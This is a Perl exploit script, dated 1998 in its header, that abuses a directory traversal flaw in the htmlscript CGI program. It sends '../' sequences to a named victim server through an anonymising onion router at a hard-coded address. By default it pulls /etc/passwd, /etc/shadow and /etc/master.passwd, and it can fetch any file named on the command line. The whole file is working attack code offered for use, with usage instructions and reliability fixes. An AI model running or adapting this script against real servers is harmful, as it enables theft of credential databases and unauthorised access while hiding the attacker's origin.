#!/usr/bin/perl -w
# $Id: htmlscript.pl,v 1.1 1998/01/29 06:28:52 zap Exp $
#
# Retrieve /etc/{passwd,shadow,master.passwd}, or a file named on the
# command line, from servers running a vulnerable version of htmlscript
# (directory traversal via "../" in the cgi-bin/htmlscript argument). The
# HTTP request is relayed through the anonymous onion router whose address
# and port are configured below.
#
# Copyright (c) 1998 by zap
#
# $Log: htmlscript.pl,v $
# Revision 1.1 1998/01/29 06:28:52 zap
# Initial revision
#
use strict;
use Socket;
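my ($verbose, $onion_router, $onion_port, $onion_timeout, $iaddr, $paddr,
    $proto, $line);
$verbose = 1;
# Hard-coded onion router address from the 1998 original. Confirm it is
# still reachable, or point these at a router you control, before use.
$onion_router = "132.250.80.12";
$onion_port = 9200;
$onion_timeout = 10;     # seconds; bounds each attempt to reach the router
# inet_aton() always succeeds on a dotted-quad literal, but if someone swaps
# in a hostname a failed lookup would otherwise hand sockaddr_in() undef.
$iaddr = inet_aton($onion_router)
    or die "Error: cannot resolve onion router $onion_router\n";
$paddr = sockaddr_in($onion_port, $iaddr);
$proto = getprotobyname("tcp");
# Arguments: <victim> [<file>]. The list assignment evaluates to the number
# of elements in @ARGV, so "or die" fires only when nothing was given. With
# no <file>, the dispatch at the bottom walks the default password databases.
my ($victim, $file) = @ARGV
    or die "Usage: $0 <victim> [<file>]\n";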
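# Fetch $file from $victim through the onion router and copy the raw
# response to STDOUT. Reads the file-scope globals $victim, $file, $paddr,
# $proto, $onion_router, $onion_timeout and $verbose; takes no arguments
# and returns nothing callers use. Dies on socket, connect, write or
# timeout failure.
#
# Timeouts use the standard alarm/eval idiom from perlipc: the ALRM handler
# dies, the eval catches it, and the socket is always closed afterwards.
# The guard is armed around connect() AND around the response read, so a
# router that accepts the connection and then goes silent cannot hang the
# script indefinitely (the original only guarded connect()).
sub get_file {
    socket(ONION, AF_INET, SOCK_STREAM, $proto)
        or die "Error: socket: $!\n";
    select(ONION); $| = 1; select(STDOUT);

    local $SIG{"ALRM"} = sub { die "timeout\n" };
    eval {
        alarm $onion_timeout;
        connect(ONION, $paddr)
            or die "Error: Connection to onion router $onion_router ",
                   "failed: $!\n";
        alarm 0;

        print "[ $victim:$file ]\n" if $verbose;
        # Proxy-style request line (HTTP/0.9, no headers). The traversal
        # sequence and $file are sent unencoded, as the vulnerable
        # htmlscript expects them.
        print ONION "GET http://$victim/cgi-bin/htmlscript?../../../",
            "../../../../..$file\n\n"
            or die "Error: write to onion router $onion_router failed: $!\n";

        # Re-arm the guard for the read: a blocking readline with no
        # pending alarm would otherwise wait forever.
        alarm $onion_timeout;
        while (defined(my $chunk = <ONION>)) { print $chunk }
        alarm 0;
    };
    my $err = $@;
    alarm 0;               # never leave a pending alarm behind
    close(ONION);

    if ($err) {
        die "Error: onion router $onion_router did not answer within ",
            "${onion_timeout}s.\n" if $err eq "timeout\n";
        die $err;
    }
}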
# Dispatch: fetch the file named on the command line, or, when none was
# given, try each of the usual password databases in turn. get_file()
# reads the target path from the file-scope $file, so it is reassigned
# before every call.
my @targets = $file
    ? ($file)
    : ("/etc/passwd", "/etc/shadow", "/etc/master.passwd");
for my $target (@targets) {
    $file = $target;
    get_file();
}